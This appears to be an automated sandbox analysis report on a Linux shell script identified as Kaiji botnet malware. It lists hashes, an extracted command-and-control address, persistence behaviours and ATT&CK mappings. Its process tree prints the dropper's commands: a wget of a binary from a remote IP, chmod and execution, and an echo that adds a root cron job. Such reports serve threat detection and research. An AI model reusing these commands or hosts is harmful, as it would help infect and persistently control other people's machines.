Analysis
-
max time kernel
149s -
max time network
148s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
16/04/2025, 18:46
Static task
static1
Behavioral task
behavioral1
Sample
download.sh
Resource
ubuntu1804-amd64-20250410-en
Behavioral task
behavioral2
Sample
download.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
download.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
download.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
download.sh
-
Size
2KB
-
MD5
544a2f391e2800bac07e883d902bcc75
-
SHA1
cea67c26c372d03b795bbba678569256385d3b83
-
SHA256
1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca
-
SHA512
f281a43fb6443bf15069aee5987d06d493bc0f0f47b927aea17115db168e6bf3271e5f37a0dc7f76defd21b60c24e513fcda0c2f109ce26f5bd4b802de184a4b
Malware Config
Extracted
kaiji
154.40.47.248:888
Signatures
-
Kaiji 1 IoCs
Kaiji payload
resource yara_rule behavioral2/files/fstream-1.dat Kaiji -
Kaiji family
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 714 chmod -
Executes dropped EXE 3 IoCs
ioc pid Process /tmp/linux_arm7 715 download.sh /tmp/linux_arm7 720 linux_arm7 /etc/32676 727 sh -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog linux_arm7 File opened for modification /dev/misc/watchdog linux_arm7 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /etc/crontab sh -
Creates/modifies environment variables 1 TTPs 3 IoCs
Creating/modifying environment variables is a common persistence mechanism.
description ioc Process File opened for modification /etc/profile.d/bash_cfg linux_arm7 File opened for modification /etc/profile.d/bash_cfg.sh linux_arm7 File opened for modification /etc/profile.d/gateway.sh linux_arm7 -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for modification /etc/init.d/kmod linux_arm7 File opened for modification /etc/init.d/sudo linux_arm7 File opened for modification /etc/init.d/alsa-utils linux_arm7 File opened for modification /etc/init.d/cron linux_arm7 File opened for modification /etc/init.d/hwclock.sh linux_arm7 File opened for modification /etc/init.d/networking linux_arm7 File opened for modification /etc/init.d/ssh linux_arm7 File opened for modification /etc/init.d/udev linux_arm7 File opened for modification /etc/init.d/auditd linux_arm7 File opened for modification /etc/init.d/console-setup.sh linux_arm7 File opened for modification /etc/init.d/keyboard-setup.sh linux_arm7 File opened for modification /etc/init.d/procps linux_arm7 File opened for modification /etc/init.d/rsyslog linux_arm7 File opened for modification /etc/init.d/selinux-autorelabel linux_arm7 File opened for modification /etc/init.d/x11-common linux_arm7 File opened for modification /etc/init.d/dbus linux_arm7 File opened for modification /etc/init.d/exim4 linux_arm7 -
Write file to user bin folder 2 IoCs
description ioc Process File opened for modification /usr/bin/include/find linux_arm7 File opened for modification /usr/bin/find linux_arm7 -
Modifies Bash startup script 2 TTPs 3 IoCs
description ioc Process File opened for modification /etc/profile.d/bash_cfg.sh linux_arm7 File opened for modification /etc/profile.d/gateway.sh linux_arm7 File opened for modification /etc/profile.d/bash_cfg linux_arm7 -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself ksoftirqd/0 720 linux_arm7 -
Command and Scripting Interpreter: Unix Shell 1 TTPs 2 IoCs
Execute scripts via Unix Shell.
pid Process 725 sh 762 sh -
Enumerates kernel/hardware configuration 1 TTPs 33 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size linux_arm7 File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size linux_arm7 File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
description ioc Process File opened for reading /proc/1/environ systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/301/stat linux_arm7 File opened for reading /proc/816/stat linux_arm7 File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems sed File opened for reading /proc/self/stat systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/635/stat linux_arm7 File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/637/stat linux_arm7 File opened for reading /proc/cmdline systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/588/stat linux_arm7 File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/814/stat linux_arm7 File opened for reading /proc/filesystems systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/807/stat linux_arm7 File opened for reading /proc/727/stat linux_arm7 File opened for reading /proc/847/stat linux_arm7 File opened for reading /proc/630/stat linux_arm7 File opened for reading /proc/720/stat linux_arm7 File opened for reading /proc/849/stat linux_arm7 File opened for reading /proc/1/environ systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems mount File opened for reading /proc/314/stat linux_arm7 File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/854/stat linux_arm7 File opened for reading /proc/filesystems systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/cmdline systemctl -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/linux_arm7 wget
Processes
-
/tmp/download.sh/tmp/download.sh1⤵
- Executes dropped EXE
PID:638 -
/bin/unameuname -s2⤵PID:639
-
-
/bin/unameuname -m2⤵PID:641
-
-
/bin/rmrm -f linux_arm72⤵PID:644
-
-
/usr/bin/wgetwget -t 1 http://154.40.47.248:8000/linux_arm72⤵
- Writes file to tmp directory
PID:648
-
-
/bin/chmodchmod +x linux_arm72⤵
- File and Directory Permissions Modification
PID:714
-
-
/tmp/linux_arm7./linux_arm72⤵
- Executes dropped EXE
- Enumerates kernel/hardware configuration
PID:715 -
/tmp/linux_arm7./linux_arm7 " "3⤵
- Modifies Watchdog functionality
- Creates/modifies environment variables
- Modifies init.d
- Write file to user bin folder
- Modifies Bash startup script
- Changes its process name
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:720 -
/bin/sh/bin/sh -c "/etc/32676&"4⤵
- Executes dropped EXE
- Command and Scripting Interpreter: Unix Shell
PID:725
-
-
/usr/sbin/serviceservice crond start4⤵PID:728
-
/usr/bin/basenamebasename /usr/sbin/service5⤵PID:729
-
-
/usr/bin/basenamebasename /usr/sbin/service5⤵PID:731
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:732
-
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"5⤵PID:735
-
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"5⤵
- Enumerates kernel/hardware configuration
PID:734
-
-
/bin/systemctlsystemctl -p Triggers show dbus.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:736
-
-
/bin/systemctlsystemctl -p Triggers show ssh.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:737
-
-
/bin/systemctlsystemctl -p Triggers show syslog.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:738
-
-
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:739
-
-
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:740
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket5⤵
- Enumerates kernel/hardware configuration
PID:743
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:745
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:747
-
-
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:749
-
-
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:751
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:754
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:756
-
-
-
/usr/local/sbin/systemctlsystemctl start crond.service4⤵PID:728
-
-
/usr/local/bin/systemctlsystemctl start crond.service4⤵PID:728
-
-
/usr/sbin/systemctlsystemctl start crond.service4⤵PID:728
-
-
/usr/bin/systemctlsystemctl start crond.service4⤵PID:728
-
-
/sbin/systemctlsystemctl start crond.service4⤵PID:728
-
-
/bin/systemctlsystemctl start crond.service4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:728
-
-
/bin/sh/bin/sh -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"4⤵
- Creates/modifies Cron job
- Command and Scripting Interpreter: Unix Shell
PID:762
-
-
/usr/bin/renicerenice -20 7204⤵PID:766
-
-
/bin/mountmount -o bind /tmp/ /proc/7204⤵
- Reads runtime system information
PID:768
-
-
/usr/sbin/serviceservice cron start4⤵PID:769
-
/usr/bin/basenamebasename /usr/sbin/service5⤵PID:770
-
-
/usr/bin/basenamebasename /usr/sbin/service5⤵PID:771
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:772
-
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"5⤵
- Reads runtime system information
PID:775
-
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:774
-
-
/bin/systemctlsystemctl -p Triggers show dbus.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:778
-
-
/bin/systemctlsystemctl -p Triggers show ssh.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:779
-
-
/bin/systemctlsystemctl -p Triggers show syslog.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:780
-
-
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:781
-
-
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:782
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket5⤵
- Enumerates kernel/hardware configuration
PID:784
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:785
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:786
-
-
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:787
-
-
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:789
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:790
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:791
-
-
-
/usr/local/sbin/systemctlsystemctl start cron.service4⤵PID:769
-
-
/usr/local/bin/systemctlsystemctl start cron.service4⤵PID:769
-
-
/usr/sbin/systemctlsystemctl start cron.service4⤵PID:769
-
-
/usr/bin/systemctlsystemctl start cron.service4⤵PID:769
-
-
/sbin/systemctlsystemctl start cron.service4⤵PID:769
-
-
/bin/systemctlsystemctl start cron.service4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:769
-
-
/bin/systemctlsystemctl start crond.service4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:792
-
-
-
-
/bin/rm/bin/rm /tmp/download.sh2⤵PID:721
-
-
/etc/32676/etc/326761⤵PID:727
-
/bin/sleepsleep 602⤵PID:730
-
-
/bin/sleepsleep 602⤵PID:830
-
-
/bin/sleepsleep 602⤵PID:854
-
Network
MITRE ATT&CK Enterprise v16
Execution
Command and Scripting Interpreter
1Unix Shell
1Scheduled Task/Job
1Cron
1Persistence
Boot or Logon Autostart Execution
2Boot or Logon Initialization Scripts
1RC Scripts
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Scheduled Task/Job
1Cron
1Privilege Escalation
Boot or Logon Autostart Execution
2Boot or Logon Initialization Scripts
1RC Scripts
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Scheduled Task/Job
1Cron
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
34B
MD5f5a3713282e43c200f30342f5ff5e2ea
SHA12b2ce1a207e2b691a074c6f78f71c4785aae426a
SHA2566ab64e727571458d4884fb2fe82c27c467db0699cb8f648b3f0217c35d2b7511
SHA5125bcb8cd360409147a486755f90e0cdd97183af02ce8de5135b7c6a8a010deb9ef12dcd5ee9a2a8fd2e159347f68e72d6b7fd75e943b4fcd928d7a74b97476013
-
Filesize
41B
MD5dc6394a4d22242b33f9d43a96ffe3502
SHA154824f7e446db91a6670d0d552d0ff41d767e9d1
SHA256e922d8377bf3bf26579efe87cdda038e2f10c5e597b2aba7677bc921bd848215
SHA5121ea735fd1abaf67eecadec35a04763a836fe11674d38976ef076883207d1708097e0dd8371e91c30a8fa2c0525da0dc2ba703b30497b279c0206e6ffcb88dd0d
-
Filesize
90B
MD56179c060af048542f9426ec07bd2d841
SHA1ab4421ac24e1481d4334862e7ceb979144d3535a
SHA256c742581cef7f919ce2516918c50022ad11da00889fff78bceed7d36f456c1b45
SHA5122ebf226a7c6e8cf252bd216036ea983fb67ba244d9a2bdb5c8d202e80a5a6feeb5d6915def4be9894d0b6acdbb85ad0177a9aac7cb2e819d340b5bb316d2c00f
-
Filesize
56B
MD5585f408444cbca746945f0cb63f2c3f0
SHA10e44bae17174f04514e770ca7fc4bec1007e39cd
SHA256ebb961c647363dfa90f302de378e0e61807b9b792fc86616635a713cca8f4299
SHA512022241dbafad55164701f67ef5b84154e3af97c5dfe77dee7bf8406f2befbd2962bbf4f243432b2f41d6c2376b87fcf551fd6945e03ddb02a5619c2f0f69c596
-
Filesize
911B
MD5522cadedcca724421b27f68657bd69b0
SHA1b42741c0734f3662d0a0c2690b7ef6414bcda4e0
SHA256836cd5eee60bdb3444bc37e4a3a4db97791b55f86f7e416718c909522a93ebe8
SHA5121ce9b1814deb5a51f6945739c66207ba2eea139b567073e4e9c63eeedf37c327f4ac87f8adc0db6eb96a483e2621d13e663e492e2d71191537e807b38e2c9b35
-
Filesize
2.0MB
MD59c069085ca52a2acca2bf52f1171a7da
SHA15c6a4714a083dcb6a44adb2043705d65a4ec61ad
SHA2561934d283e13ddcbe0c1c85e4d41d7c27a1261b0f0d9302451b042952e2708a3e
SHA51207a87d09d1711c23b95a904d47aa003dfca41fde7af2b3e220bf1dc8f4a4ae4c4ddb2394150652ac50afde4810250418172fdeb7859a664751be5e80354e5034
-
Filesize
134KB
MD5138a27d6fe52fa1132760a4fa48922e0
SHA1e0250e4d7bf33a5a1064344224148b889cb15138
SHA25681a10dad907b23521461bd3fc83c2cedb2218933a328d9a05e3c9f6a9a1d42aa
SHA512ee0078afad63fc2aaffdebb7127d1c7d4459287fee75358f57c82d397c39b7bf64338fb6996dfb1747cd9a896d714b3c76f0948727be91550f1affa1c0298a9e